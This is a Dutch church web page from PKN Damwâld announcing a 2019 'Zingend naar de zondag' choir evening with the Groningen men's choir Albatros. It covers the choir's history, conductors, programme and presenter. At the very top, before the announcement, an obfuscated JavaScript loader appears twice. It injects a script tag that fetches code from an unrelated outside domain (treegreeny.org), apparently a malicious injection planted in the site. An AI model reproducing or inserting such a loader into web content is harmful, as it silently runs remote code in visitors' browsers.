;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vooraankondiging Zingend naar de zondag Damwâld - PKN Damwâld

Vooraankondiging Zingend naar de zondag Damwâld

Gepubliceerd op: maandag 2 september 2019

Op zaterdagavond 26 oktober organiseren wij wederom Zingend naar de zondag in de Gereformeerde Kerk de Ontmoeting aan de Foarwei 48 te Damwald. Deze keer hebben we het bekende Groninger Chr. Mannenkoor Albatros uitgenodigd om u te laten genieten van hoogstaande zangkunst in zowel de Nederlandse als de Russische taal.
Albatros, voortgekomen uit de gelijknamige sigarenfabriek in Nieuwe Pekela, werd opgericht in 1932. In de fabriek werkte veel personeel met een Christelijke achtergrond en onder het werk zongen veel mannen, vaak sigarenmakers, psalmen en andere christelijke liederen. Dit leidde tot de oprichting van het koor. De initiatiefnemers hebben niet kunnen bedenken waartoe het fabriekskoor van toen zou uitgroeien: een mannenkoor met zangers uit de wijde regio en dat inmiddels tot de nationale top mag worden gerekend door kwaliteit, klasse, stijl en repertoire.
Het hoge niveau is mede de verdienste van dirigent Anton Stulp en hierbij werd wekelijks de hulp is ingeroepen van een zangpedagoog. Aspirant leden moeten over voldoende zangkwaliteiten beschikken en pas na een proefperiode van zes maanden kan men officieel lid worden van het koor. Het koor treedt gemiddeld 20 keer op tijdens concerten in binnen- en buitenland. Hierbij maken ze gebruik van aanvullende muzikale begeleiding op het orgel, piano, percussie of accordeon. Uiteraard worden ook diverse nummers a capella gezongen. Na 45 jaar dirigent geweest te zijn van Albatros overleed Anton Stulp in april 2019. Dit was een enorme schok voor de familie, het mannenkoor en de gehele muziekwereld. Het dirigeerstokje is overgenomen door de reserve dirigent Cas Straatman die deze avond het koor zal dirigeren.
In de muziekwereld is Cas Straatman geen onbekende. Hij studeerde in Groningen aan het Prins Claus conservatorium de vakken piano klassiek en jazz en geeft thans les aan de Musicalopleiding van de Hanzehogeschool en de Dansacademie Noord Nederland. Hij is ook artistiek leider van Musica Son, de naam voor diverse koren en freelance activiteiten. De begeleiding op het orgel is deze avond in handen van Bouko Tiggelaar.
Het belooft weer een prachtige avond te worden waarin het koor reguliere en bekende liederen zal zingen maar ook diverse Russische liturgische liederen, zoals Bozje Nash, Amien en
Mnogaja ljeta. You raise me Up, Hallelujah (Cohen), King All Glorious en de Holy City staan ook op het programma. Het belooft weer een geweldige avond te worden met dit ruim 60 leden tellende koor uit onze buurprovincie Groningen.
Uiteraard is er ook weer veel samenzang van bekende liederen. Kortom een avond die u niet mag missen en waarvoor wij u wederom van harte uitnodigen om die bij te wonen.
De presentatie is in handen van Ds. Gera den Dikken uit Drachten. Getroffen door de tekst: Gij zult mijn getuigen zijn uit Handelingen 1: 8 ging ze de Master-opleiding voor Gemeentepredikant volgen en is nu als predikant verbonden aan de Protestante Gemeente “de Oase” in Drachten. De avond begint om 19.30 uur met halverwege een koffie/thee pauze met aan het eind een collecte voor de bestrijding van de onkosten.